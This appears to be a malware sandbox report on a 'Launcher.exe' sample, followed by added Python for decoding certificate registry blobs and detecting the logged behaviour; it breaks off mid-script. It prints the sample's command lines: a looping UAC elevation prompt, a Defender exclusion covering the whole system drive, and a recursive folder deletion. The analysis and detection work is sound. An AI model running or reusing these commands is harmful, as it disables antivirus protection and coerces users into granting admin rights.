Platform

win10-20240214-en

Max time kernel

118s

Max time network

130s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x41c

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3168-4-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp

memory/3168-5-0x0000021C22490000-0x0000021C224B2000-memory.dmp

memory/3168-7-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-6-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-10-0x0000021C22790000-0x0000021C22806000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5msxsfyw.pkv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3168-31-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-37-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x380

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

memory/192-4-0x000002B864780000-0x000002B8647A2000-memory.dmp

memory/192-5-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp

memory/192-6-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-7-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-10-0x000002B864930000-0x000002B8649A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxtcg1as.rfm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/192-31-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-37-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

63s

Max time network

84s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

121s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"

Signatures

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4232 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 1632 wrote to memory of 4392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true
function Get-Win {
    while ($true) {
        #
        if ($AdminRightsRequired) {
            #
            try {
                Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait
                #
                break
            } catch {
                Write-Host 'Error 0xc0000906'
            }
        } else {
            #
            break
        }
    }
}
Get-Win"

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp

Files

memory/1632-2-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/1632-4-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-3-0x0000000007310000-0x0000000007346000-memory.dmp

memory/1632-5-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-6-0x0000000007A70000-0x0000000008098000-memory.dmp

memory/1632-7-0x0000000007A10000-0x0000000007A32000-memory.dmp

memory/1632-8-0x00000000082F0000-0x0000000008356000-memory.dmp

memory/1632-9-0x00000000083A0000-0x0000000008406000-memory.dmp

memory/1632-10-0x0000000008410000-0x0000000008760000-memory.dmp

memory/1632-11-0x0000000008240000-0x000000000825C000-memory.dmp

memory/1632-12-0x00000000087E0000-0x000000000882B000-memory.dmp

memory/1632-13-0x0000000008B30000-0x0000000008BA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfnruqfw.jm4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1632-28-0x0000000009BB0000-0x0000000009C44000-memory.dmp

memory/1632-29-0x00000000098F0000-0x000000000990A000-memory.dmp

memory/1632-30-0x0000000009940000-0x0000000009962000-memory.dmp

memory/1632-31-0x000000000A150000-0x000000000A64E000-memory.dmp

memory/4216-38-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/4216-39-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/4216-40-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/4216-57-0x000000007EFE0000-0x000000007EFF0000-memory.dmp

memory/4216-58-0x00000000090F0000-0x0000000009123000-memory.dmp

memory/4216-59-0x000000006F4D0000-0x000000006F51B000-memory.dmp

memory/4216-60-0x00000000090D0000-0x00000000090EE000-memory.dmp

memory/4216-65-0x0000000009140000-0x00000000091E5000-memory.dmp

memory/4216-66-0x0000000006BB0000-0x0000000006BC0000-memory.dmp

memory/1632-192-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/4216-260-0x0000000006D90000-0x0000000006DAA000-memory.dmp

memory/4216-265-0x0000000006D80000-0x0000000006D88000-memory.dmp

memory/4216-281-0x0000000072730000-0x0000000072E1E000-memory.dmp

memory/1632-282-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-284-0x0000000007430000-0x0000000007440000-memory.dmp

memory/1632-285-0x0000000007430000-0x0000000007440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 69abf6b01a287d3bab9aa753a19562ac
SHA1 cb002d745055132c11e5432f9ca5c8f452c6067d
SHA256 477924224be8ac5194c94a52115ac451c63530c0ce9bfe757598ef9cf84b495e
SHA512 70c2b8f847da67b95a3d15cea9912cddddfc59d7f1f2f350c3c1c13e28baa5f6efd448013e5134e9f909705be7b0e38e6748aacce4237e6b0e2cdedaa647bccf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 db01a2c1c7e70b2b038edf8ad5ad9826
SHA1 540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512 c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

memory/1632-290-0x0000000072730000-0x0000000072E1E000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

Signatures

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan

Note: D69B561148F01C77C54578C10926DF5B856976AD, the key written below, is the SHA-1 thumbprint of the public GlobalSign Root CA - R3; its name is readable as UTF-16 in the blob (property 0x0b) ahead of the DER certificate (property 0x20, beginning 3082035f). Windows writes AuthRoot entries like this itself when a certificate chain build, here inside the PowerShell child, fetches a root through the Microsoft root program's auto-update. On its own the signature therefore does not show an attacker-controlled root being installed; a blob under a thumbprint that matches no known public CA, or whose DER does not hash to the key name, would.
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A
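
The Blob values logged above (here and in the earlier Launhcer.exe analysis) are CryptoAPI's serialized-property encoding: a run of records, each `uint32 property id, uint32 reserved (always 1), uint32 length, data`, with the property ids from wincrypt.h. The following parser is an added example, not part of the sandbox report or of the sample; it walks that layout, decodes the friendly name, and checks that the DER at property 0x20 hashes to the thumbprint the key was written under, which is the check that separates an AuthRoot auto-update write from a planted root. `REPORT_FRAGMENT_HEX` is the first two records copied from the blob above; the full-blob sample is constructed with placeholder bytes in place of a real DER certificate so it runs offline.

```python
r"""Decode a SystemCertificates\...\Certificates\<thumbprint>\Blob registry value.

Added example (not part of the sandbox report). Record layout:
    uint32 property_id | uint32 reserved (always 1) | uint32 length | data[length]
CONSTRUCTED_CERT is placeholder bytes, not DER; REPORT_FRAGMENT_HEX is copied from the report.
"""
import hashlib
import struct

# Property ids present in the report's blob, with their wincrypt.h names.
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x04: "CERT_MD5_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0b: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0f: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x1d: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
    0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    0x62: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

# First two records of the behavioral13 blob: 0x0f signature hash, then the 0x0b friendly name.
REPORT_FRAGMENT_HEX = (
    "0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab"
    "0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f007400"
    "20004300410020002d002000520033000000"
)


def parse_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the records and return {property_id: data}; malformed input raises ValueError."""
    props: dict[int, bytes] = {}
    offset = 0
    while offset < len(blob):
        if len(blob) - offset < 12:
            raise ValueError(f"truncated record header at offset {offset}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, offset)
        offset += 12
        if reserved != 1 or offset + length > len(blob):
            raise ValueError(f"malformed record for property {prop_id:#x}")
        props[prop_id] = blob[offset:offset + length]
        offset += length
    return props


def build_blob(props: dict[int, bytes]) -> bytes:
    """Inverse of parse_blob; used here only to construct sample data."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in props.items())


def summarise(registry_key_name: str, blob: bytes) -> dict:
    """Decode the name and cross-check the key name (SHA-1 thumbprint) against the stored DER."""
    props = parse_blob(blob)
    der = props.get(0x20, b"")
    sha1_of_der = hashlib.sha1(der).hexdigest()
    stored_sha1 = props.get(0x03, b"").hex()
    return {
        "friendly_name": props.get(0x0b, b"").decode("utf-16-le").rstrip("\x00"),
        "properties": [PROP_NAMES.get(pid, f"unknown_{pid:#x}") for pid in props],
        "sha1_of_der": sha1_of_der,
        "sha256_of_der": hashlib.sha256(der).hexdigest(),
        "stored_sha256": props.get(0x62, b"").hex(),
        # AuthRoot auto-update never writes a DER that fails to hash to its own key name.
        "consistent": sha1_of_der == stored_sha1 == registry_key_name.lower(),
    }


# Constructed sample: the real property layout around placeholder certificate bytes.
CONSTRUCTED_CERT = b"constructed placeholder, not a DER certificate"
CONSTRUCTED_BLOB = build_blob({
    0x0b: "GlobalSign Root CA - R3\x00".encode("utf-16-le"),
    0x03: hashlib.sha1(CONSTRUCTED_CERT).digest(),
    0x62: hashlib.sha256(CONSTRUCTED_CERT).digest(),
    0x20: CONSTRUCTED_CERT,
})
CONSTRUCTED_KEY = hashlib.sha1(CONSTRUCTED_CERT).hexdigest().upper()

if __name__ == "__main__":
    for pid, data in parse_blob(bytes.fromhex(REPORT_FRAGMENT_HEX)).items():
        shown = data.decode("utf-16-le") if pid == 0x0b else data.hex()
        print(f"{PROP_NAMES.get(pid, pid)}: {shown}")
    print(summarise(CONSTRUCTED_KEY, CONSTRUCTED_BLOB))
```

Run against a real export (`reg export` of the key, or the raw value read with `winreg`), `summarise` returning `consistent: False`, or a `sha256_of_der` that is not a Microsoft root program fingerprint, is what would turn this signature into a finding.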

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

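The three command lines in this Processes block, and the Launhcer.exe chain earlier in the report that adds the `Start-Process -Verb RunAs` retry loop, are the behaviour worth alerting on: PowerShell started with `-ExecutionPolicy Bypass` by a binary in the user's Temp directory, a Defender exclusion for `$env:ProgramData`, `$env:AppData` and the whole system drive, an elevation prompt re-issued until the user clicks through, and `rd /s /q` on the staging directory afterwards. The script below is an added example, not the report's or the sample's code; it runs those checks over process-creation records constructed from the report's tables. The record fields (`pid`, `ppid`, `image`, `cmdline`) are an assumed schema, the parent PID 1000 for the root processes is assumed, and the PowerShell script is embedded with the line breaks the sandbox rendering collapsed.

```python
"""Flag the command-line patterns recorded in this report in process-creation events.

Added example (not part of the sandbox report or the sample). The sample events are
constructed from the report's Processes and WriteProcessMemory tables; the record schema
(pid, ppid, image, cmdline) is assumed and maps differently onto Sysmon event 1 or an EDR feed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass", re.I)
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+(?P<paths>[^;|\"]+)", re.I)
# Excluding any of these roots from Defender covers everything a user can write to.
BROAD_ROOTS = {"$env:programdata", "$env:appdata", "$env:localappdata", "$env:systemdrive\\", "c:\\"}
UAC_LOOP_RE = re.compile(r"while\s*\(\s*\$true\s*\).*?Start-Process\b.*?-Verb\s+RunAs", re.I | re.S)
RD_RE = re.compile(r"\brd\s+/s\s+/q\s+\"?(?P<dir>[^\"&]+)", re.I)
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def analyse(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Return {pid: [finding, ...]} for every event that matches at least one pattern."""
    by_pid = {e.pid: e for e in events}
    findings: dict[int, list[str]] = {}
    for e in events:
        hits = []
        parent = by_pid.get(e.ppid)
        if BYPASS_RE.search(e.cmdline) and parent and USER_TEMP_RE.search(parent.image):
            hits.append("powershell -ExecutionPolicy Bypass launched by a %TEMP% binary: "
                        + parent.image.rsplit("\\", 1)[-1])
        m = EXCLUSION_RE.search(e.cmdline)
        if m:
            paths = [p.strip() for p in m.group("paths").split(",")]
            broad = [p for p in paths if p.lower() in BROAD_ROOTS]
            if broad:
                hits.append("Defender exclusion for broad roots: " + ", ".join(broad))
        if UAC_LOOP_RE.search(e.cmdline):
            hits.append("UAC prompt loop: Start-Process -Verb RunAs inside while ($true)")
        m = RD_RE.search(e.cmdline)
        if m and re.search(r"\\AppData\\", m.group("dir"), re.I):
            hits.append("recursive deletion of a profile directory: " + m.group("dir").strip())
        if hits:
            findings[e.pid] = hits
    return findings


def sample_events() -> list[ProcEvent]:
    """Constructed from the report's process tree; PIDs are those in the WriteProcessMemory table."""
    base = r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services"
    ps = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command '
    return [
        ProcEvent(4232, 1000, base + r"\Launhcer.exe", f'"{base}\\Launhcer.exe"'),
        ProcEvent(1632, 4232, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                  ps + r'''"$AdminRightsRequired = $true
function Get-Win {
    while ($true) {
        #
        if ($AdminRightsRequired) {
            #
            try {
                Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait
                #
                break
            } catch { Write-Host 'Error 0xc0000906' }
        } else {
            #
            break
        }
    }
}
Get-Win"'''),
        ProcEvent(4392, 1632, base + r"\data\Launcher.exe", f'"{base}\\data\\Launcher.exe"'),
        ProcEvent(4216, 4392, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                  ps + r'''"Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'''),
        ProcEvent(5112, 4392, r"C:\Windows\SysWOW64\cmd.exe",
                  r'''"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT'''),
        # Benign control: an interactive shell started from the desktop.
        ProcEvent(7000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "powershell.exe -Command Get-Date"),
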